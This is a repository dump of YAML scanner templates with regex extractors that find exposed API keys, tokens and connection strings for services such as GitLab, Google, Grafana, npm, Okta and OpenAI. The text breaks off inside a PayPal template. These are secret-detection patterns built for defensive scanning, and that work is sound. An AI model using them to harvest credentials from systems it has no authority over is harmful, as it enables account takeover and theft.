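4a0a0047304502206bdea7a5561d353ecf0a6457d342c940765d8eb423c3755d8333abf20dd73a4c022100bd0ba1e3a2ae3c4a5f075e75be2bf4db20ed798233f99cc306f29b550ec7a054:922c64590222798bb761d5b6d8e72950 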
-------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gitlab/gitlab-personal-accesstoken.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-personal-accesstoken 2 | 3 | info: 4 | name: GitLab Personal Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml 9 | - https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html 10 | metadata: 11 | verified: true 12 | tags: file,keys,gitlab,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' 22 | # digest: 4a0a00473045022100d8f81a139d1a55d53b48483cf5f37388a5aa00533518f37e62262ce7d746a8e30220645f888c251b51c3e07bb926d8f51c1bc02d0e34e1970911c9aa95395364078b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gitlab/gitlab-pipeline-triggertoken.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-pipeline-triggertoken 2 | 3 | info: 4 | name: GitLab Pipeline Trigger Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml 9 | - https://docs.gitlab.com/ee/ci/triggers/ 10 | - https://gitlab.com/gitlab-org/gitlab/-/issues/371396 11 | - https://gitlab.com/gitlab-org/gitlab/-/issues/388379 12 | metadata: 13 | verified: true 14 | tags: keys,file,gitlab,token 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - '\b(glptt-[0-9a-f]{40})\b' 24 | # digest: 
4a0a004730450221008cbf4eb94765a87a19f157f6c0c8c2bdf2065beccbd30d912cc939db48373953022029b0256eda9ca89370a55cd4af46c29517647ada90ad11704cd7dd580313882d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/gitter-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: gitter-access-token 2 | 3 | info: 4 | name: Gitter Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go 10 | metadata: 11 | verified: true 12 | tags: gitter,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022024b31fc9eb1fabba2e0853bff3057754737098dce170f37dae5b48e451e37adf022100cadc0986bb67a10f42b716e69921383c00f6e61fdc87f2bfded8780288c024c5:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/google/google-api.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key-file 2 | 3 | info: 4 | name: Google API key 5 | author: gaurang 6 | severity: info 7 | tags: keys,file,token,google 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "AIza[0-9A-Za-z\\-_]{35}" 16 | # digest: 4a0a00473045022100d10b8c8ea01d04d065a9d13f5f60048a32c908cc2c5a3f9b4ddcb5ba2f7e823a022039f78018968a42018e32f1a2ccb17df81b9255d14d9094659d95e160eb09eb4a:922c64590222798bb761d5b6d8e72950 
-------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/google/google-clientid.yaml: -------------------------------------------------------------------------------- 1 | id: google-clientid 2 | 3 | info: 4 | name: Google Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml 9 | metadata: 10 | verified: true 11 | tags: file,keys,google,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' 21 | # digest: 4a0a0047304502204d6ddfacde924e20772b34f26f8f705be85f7bf5bc9078c729a7f7edc99a9dcf022100a64c8e922783d1374f6cbc1f132b56a1efd3de3c59a2ed6ba3d3266225e7ffa4:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/google/google-oauth-clientsecret.yaml: -------------------------------------------------------------------------------- 1 | id: google-oauth-clientsecret 2 | 3 | info: 4 | name: Google OAuth Client Secret (prefixed) 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml 9 | metadata: 10 | verified: true 11 | tags: file,keys,google,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '(GOCSPX-[a-zA-Z0-9_-]{28})' 21 | # digest: 4a0a004730450220157b3e82f90478510f0f71167cfa1f517878cfc309707142fa439d38149c8a1a022100a54beacb6de85b38bddad57f4d7090ba367df0825c9c4fbfa165f7cb8ae0d4e9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/grafana/grafana-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: 
grafana-api-key 2 | 3 | info: 4 | name: Grafana API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go 10 | metadata: 11 | verified: true 12 | tags: grafana,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100f94f26615c01ee3669910469b31e0011b160852246ed76ae9802f34d6be1911c022076cd3f3e6b5257f59db3fb098baf801c44b0a628196d408b70d1765bb646a7c9:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/grafana/grafana-cloud-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-cloud-api-token 2 | 3 | info: 4 | name: Grafana Cloud API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go 10 | metadata: 11 | verified: true 12 | tags: grafana,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4a0a00473045022100ac8747d010f2f8ecbbf15e54c1a4f79e1e965927e8077c7e25d72c003adf0d9a02205ec44b2c0ae24af123d96ec3b31d842f77287892e7f1f5a92d08a213dd5af080:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- 
/scan/gadget/sensitive/keys/grafana/grafana-service-account-token.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-service-account-token 2 | 3 | info: 4 | name: Grafana Service Account Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go 10 | metadata: 11 | verified: true 12 | tags: grafana,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\"|\n|\r|\s|\x60|;]|$) 22 | 23 | # digest: 4b0a00483046022100d0d2caaae6ee74a09fb5d24db235ba021d75800eafa6dbc83777ac9213de0eff022100f4dde19703abd7a8925d6b3dbcfa20ac5d7e72e6f670baed1ea04e57e3fdfd5a:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/hashicorp-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: hashicorp-api-token 2 | 3 | info: 4 | name: Hashicorp API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.yaml 9 | - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/hashicorp-tf-api-token.go 10 | metadata: 11 | verified: true 12 | tags: hashicorp,file,keys 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)[a-z0-9]{14}\.atlasv1\.[a-z0-9\-_=]{60,70} 22 | 23 | # digest: 
490a004630440220077946f13881a3f72dcf81af66d6441c54bcfa9ebf55bb2a9b9b8e16ca48f82c022071b09b7aa278782ba81b70d8da7eed2b6876da0e551fc1a23533e1d67f4cce02:922c64590222798bb761d5b6d8e72950 24 | -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/heroku-key.yaml: -------------------------------------------------------------------------------- 1 | id: heroku-key 2 | 3 | info: 4 | name: Heroku API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/heroku.yml 9 | - https://devcenter.heroku.com/articles/authentication 10 | metadata: 11 | verified: true 12 | tags: file,keys,heroku,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - '(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b' 22 | # digest: 4a0a00473045022100e9a5fe2b9b5307955ba8c070625b450f87018040278cac9d857936ad0a3b43fc022030fdf2d770b0a7de20c15055be3d5c8cde50df6937d8ebf01072ac9f83b9f461:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/huggingface/huggingface-user-access.yaml: -------------------------------------------------------------------------------- 1 | id: huggingface-user-access 2 | 3 | info: 4 | name: HuggingFace User Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/huggingface.yml 9 | - https://huggingface.co/docs/hub/security-tokens 10 | metadata: 11 | verified: true 12 | tags: huggingface,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(hf_[a-zA-Z]{34})\b' 23 | # digest: 
4b0a00483046022100934e5db46a96a95fbd52e60737825b1ed564ae6f42363a5843a5317f25c8b15d0221008fd6451b353118cd6c0b7a054f49e79c36d5c4222658de97e4b5fea6731da789:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/jenkins-token.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-token 2 | 3 | info: 4 | name: Jenkins Token or Crumb 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/jenkins.yml 9 | - https://www.jenkins.io/blog/2018/07/02/new-api-token-system/ 10 | - https://www.jenkins.io/doc/book/security/csrf-protection/ 11 | metadata: 12 | verified: true 13 | tags: file,keys,jenkins,crumb,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b' 23 | # digest: 4b0a00483046022100bbae117ce6e36c2edabf974fd82254d93119455c3ffaae610bba874bb154fd14022100c94a0e7d792202691a4e8608e7cefcf2bcd0323c9b4c9dacb555345000ec4b0b:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/kubernetes/kubernetes-dockercfg-secret.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dockercfg-secret 2 | 3 | info: 4 | name: kubernetes.io/dockercfg Secret 5 | author: dwisiswant0 6 | severity: info 7 | reference: 8 | - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets 9 | metadata: 10 | verified: true 11 | tags: kubernetes,k8s,file,keys,secret 12 | 13 | file: 14 | - extensions: 15 | - yaml 16 | - yml 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \.dockercfg:\s+["']?e(w|y)[\w=]+["']? 
23 | # digest: 4b0a0048304602210084bb6909a2c7963a555e1075de093962ffd4e4b125d3dd1bb559eccf252e697c022100d2e745493ab0b3a250e96f74744924d34f1cb1cf18b265e81ebba442c3eb52ad:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/kubernetes/kubernetes-dockerconfigjson-secret.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dockerconfigjson-secret 2 | 3 | info: 4 | name: kubernetes.io/dockerconfigjson Secret 5 | author: dwisiswant0 6 | severity: info 7 | reference: 8 | - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets 9 | metadata: 10 | verified: true 11 | tags: kubernetes,k8s,file,keys,secret 12 | 13 | file: 14 | - extensions: 15 | - yaml 16 | - yml 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \.dockerconfigjson:\s+["']?e(w|y)[\w=]+["']? 23 | # digest: 490a0046304402205837efe22bf2818e0eff1697ee0cfa3f5e769e3c20fa63e1291c6243d921daa202207523ce58ac252a1a71bbbf192eb381aa08631c976b1860127bf5e77441876053:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/linkedin-id.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-id 2 | 3 | info: 4 | name: Linkedin Client ID 5 | author: gaurang 6 | severity: low 7 | tags: file,keys,token,linkedin 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" 16 | # digest: 4a0a0047304502203d8afe36515a2055a46a90e36140bedad012308b2ee65ab71a018d3ebd0d502d022100e1ed5b6faf198657fe22358330ac6eb9dfbc042875faafbef04b8fa083eeecf9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/linkedin/linkedin-client.yaml: 
-------------------------------------------------------------------------------- 1 | id: linkedin-client 2 | 3 | info: 4 | name: LinkedIn Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml 9 | - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications 10 | metadata: 11 | verified: true 12 | tags: linkedin,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)linkedin.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{12,14})\b 23 | # digest: 4a0a00473045022100ade417f9932824017914990383cd867a37ba57dd1badc60aa55dac97e73cbf3f02203bb0babcad422204af64f70926c18827b3940c69f909d205f440468d18b0bb31:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/linkedin/linkedin-secret.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-secret 2 | 3 | info: 4 | name: LinkedIn Secret Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml 9 | - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications 10 | metadata: 11 | verified: true 12 | tags: linkedin,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)linkedin.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{16})\b 23 | # digest: 
4a0a0047304502205def151b767d6270018ea90666e56089b0dde70467ca94489c6ab9ec0b735fe2022100ea3cee5471199b7e21bd6a63b75a667adcddad7281d249e83cbb8eb8cda82fd7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/mailchimp-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-api-key 2 | 3 | info: 4 | name: Mailchimp API Key 5 | author: gaurang 6 | severity: high 7 | tags: keys,file,token,mailchimp 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "[0-9a-f]{32}-us[0-9]{1,2}" 16 | # digest: 4a0a00473045022100b7d7dc7f716b2b6aa9f8fc0e8f2455cd4598868f7cdf43257e6359058f2bb4ab02201b98b540e564948f56babb33b53688a32a426e54dc32d0ca159d70eebb798191:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/mailgun-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailgun-api-key 2 | 3 | info: 4 | name: Mailgun API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,mailgun 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "key-[0-9a-zA-Z]{32}" 16 | # digest: 4a0a00473045022006098cd86f41bfb24a9c4c7c6bfc1a855c71c69e8b834739e5ffc4567261266c022100bd407109d7d54367361ebda630747d01a6ba308679d3f50a1654629aa9da4873:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/mapbox-token.yaml: -------------------------------------------------------------------------------- 1 | id: mapbox-token 2 | 3 | info: 4 | name: Mapbox Token 5 | author: Devang-Solanki 6 | severity: medium 7 | reference: 8 | - https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token 9 | - 
https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go 10 | metadata: 11 | verified: true 12 | tags: file,keys,token,mapbox 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | name: mapbox-public-token 20 | part: body 21 | regex: 22 | - 'pk\.eyJ1Ijoi\w+\.[\w-]*' 23 | 24 | - type: regex 25 | name: mapbox-secret-token 26 | part: body 27 | regex: 28 | - 'sk\.eyJ1Ijoi\w+\.[\w-]*' 29 | # digest: 4a0a00473045022100a7ea48306be5c2b2cfc395952e068bd2e299957868b11ba57c2c45fa49ff188502201ba10a29d5332a82ed0fa1c984668ce2df5e2213391127664a2eef6a04a299a9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-api-service.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-api-service 2 | 3 | info: 4 | name: New Relic API Service Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml 9 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys 10 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#user-key 11 | metadata: 12 | verified: true 13 | tags: newrelic,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - (?i)\b(nrak-[a-z0-9]{27})\b 24 | # digest: 4a0a00473045022100b0305a1f0644ca813e1b1408183fb6100e36a5ccf5716a072f32d60cf9956d7102207b59c7dc0411cc69bf362c9a1035ac73c61bccbabbbfeea75aa3eff7db628214:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-license.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-license 2 | 3 | info: 4 | name: New Relic License Key 5 | 
author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml 9 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys 10 | - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#license-key 11 | metadata: 12 | verified: true 13 | tags: newrelic,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - (?i)\b([a-z0-9]{6}[a-f0-9]{30}nral)\b 24 | # digest: 4b0a00483046022100e041b8d63bb59009c36c1d2f8b42a95d352acb3c8d0345afae5b908a78ab8f090221009e2de0a5b782aa3b65c7cbf357c0c7cd47497bef6ade233b239afa63ff863fff:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-pixie-apikey.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-pixie-apikey 2 | 3 | info: 4 | name: New Relic Pixie API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml 9 | - https://docs.px.dev/reference/admin/api-keys/ 10 | metadata: 11 | verified: true 12 | tags: file,keys,newrelic,pixie,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})" 22 | # digest: 4a0a00473045022100c87ef60160177e4dd9cf059f2a4fb1feb922f1dc810beec9f3153393645edb8d0220317d229ff5d7af76fce023056bc85f19f45ff91efeb256c4fca4137237156ad0:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/newrelic/newrelic-pixie-deploykey.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-pixie-deploykey 2 | 
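3 | info:
4 |   name: New Relic Pixie Deploy Key
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml
9 |     - https://docs.px.dev/reference/admin/api-keys/
10 |   metadata:
11 |     verified: true
12 |   tags: file,keys,newrelic,pixie,token
13 | file:
14 |   - extensions:
15 |       - all
16 |
17 |     extractors:
18 |       - type: regex
19 |         part: body
20 |         regex:
21 |           - "(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})"
22 | # digest: 4a0a0047304502203c71b329d4ef2552fb587dfa8d1a5717b95763f35295f0d2cb52eee420376850022100ac94ca2b4d48c633bf969eebd6fcbaff6894322bda4e05bce3129184cbfdd205:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/npm-accesstoken.yaml:
--------------------------------------------------------------------------------
1 | id: npm-accesstoken
2 |
3 | info:
4 |   name: NPM Access Token (fine-grained)
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/npm.yml
9 |     - https://docs.npmjs.com/about-access-tokens
10 |     - https://github.com/github/roadmap/issues/557
11 |     - https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/
12 |   metadata:
13 |     verified: true
14 |   tags: keys,file,npm,token
15 | file:
16 |   - extensions:
17 |       - all
18 |
19 |     extractors:
20 |       - type: regex
21 |         part: body
22 |         regex:
23 |           # Single-quoted on purpose: inside a double-quoted YAML scalar "\b" is the
24 |           # backspace escape (U+0008), so the word-boundary anchors would never reach
25 |           # the regex engine and the pattern could not match a token in ordinary text.
26 |           - '\b(npm_[A-Za-z0-9]{36})\b'
27 | # NOTE(review): the digest below was issued for the pre-edit text; presumably it must be regenerated (template re-signed) after this change.
28 | # digest: 490a00463044022039866b0873f183f09afcd27823a4cc86515fb680c821d4ed80919cfa1ff69ac502202599aa40303d5467e19c13645105ca6c34c17796b73d6fabba5631c2476b3a73:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/nuget-key.yaml:
--------------------------------------------------------------------------------
1 | id: nuget-key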
2 | 3 | info: 4 | name: NuGet API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/nuget.yml 9 | - https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys 10 | metadata: 11 | verified: true 12 | tags: keys,file,nuget,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - "(oy2[a-z0-9]{43})" 22 | # digest: 4a0a004730450221009ee6a3a09c234f4c41ee6c71b99a1461f714627ed8456ccd26fcd90b919ae3ec02203456759520c590ad30114fbac0a6723adb8c53dfd531b655d1af290117c24c04:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/odbc/odbc-connection.yaml: -------------------------------------------------------------------------------- 1 | id: odbc-connection 2 | 3 | info: 4 | name: ODBC Connection String 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/odbc.yml 9 | metadata: 10 | verified: true 11 | tags: odbc,keys,file 12 | 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - (?i)(?:User|User\sId|UserId|Uid)\s*=\s*([^\s;]{3,100})\s*;[\ \t]*.{0,10}[\ \t]*(?:Password|Pwd)\s*=\s*([^\t\ ;]{3,100})\s*(?:[;]|$) 22 | # digest: 4a0a004730450221009cdd18eb9c779b2230d9b141a315ef98d1da77f0173be2da4d099c46e3b5c46f02207ae6fac5ccfbcbe6ab6902e3e4431449873bf31680040ec3b616c0e3750e1c4d:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/okta/okta-api.yaml: -------------------------------------------------------------------------------- 1 | id: okta-api 2 | 3 | info: 4 | name: Okta API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - 
https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/okta.yml 9 | - https://devforum.okta.com/t/api-token-length/5519 10 | - https://developer.okta.com/docs/guides/create-an-api-token/main/ 11 | metadata: 12 | verified: true 13 | tags: okta,keys,file 14 | 15 | file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - (?i)(?s)(?:okta|ssws).{0,40}\b(00[a-z0-9_-]{39}[a-z0-9_])\b 24 | # digest: 4b0a0048304602210099f31a1c5cf66963fb04f1f4a78317a1329098914e756d1a97879086ca81de74022100c51328ddf041ad3e06759c5ce691eed371adf63ef1c6d203b2a50d87b165b1f9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/openai-key.yaml: -------------------------------------------------------------------------------- 1 | id: openai-key 2 | 3 | info: 4 | name: OpenAI API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/openai.yml 9 | - https://platform.openai.com/docs/api-reference 10 | - https://platform.openai.com/docs/api-reference/authentication 11 | metadata: 12 | verified: true 13 | tags: file,keys,openai,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - \b(sk-[a-zA-Z0-9]{48})\b 23 | # digest: 4a0a004730450220546f51da9aae790d391a6842237a517f47af7be274bdfa184f865fef630755fb022100fd67b83c7512040fa26564d51c5b03b08f6dc269a73b1fed32b696c5809bbc1c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/paypal-braintree-token.yaml: -------------------------------------------------------------------------------- 1 | id: paypal-braintree-token 2 | 3 | info: 4 | name: Paypal Braintree Access Token 5 | author: gaurang 6 | severity: high 7 | tags: 
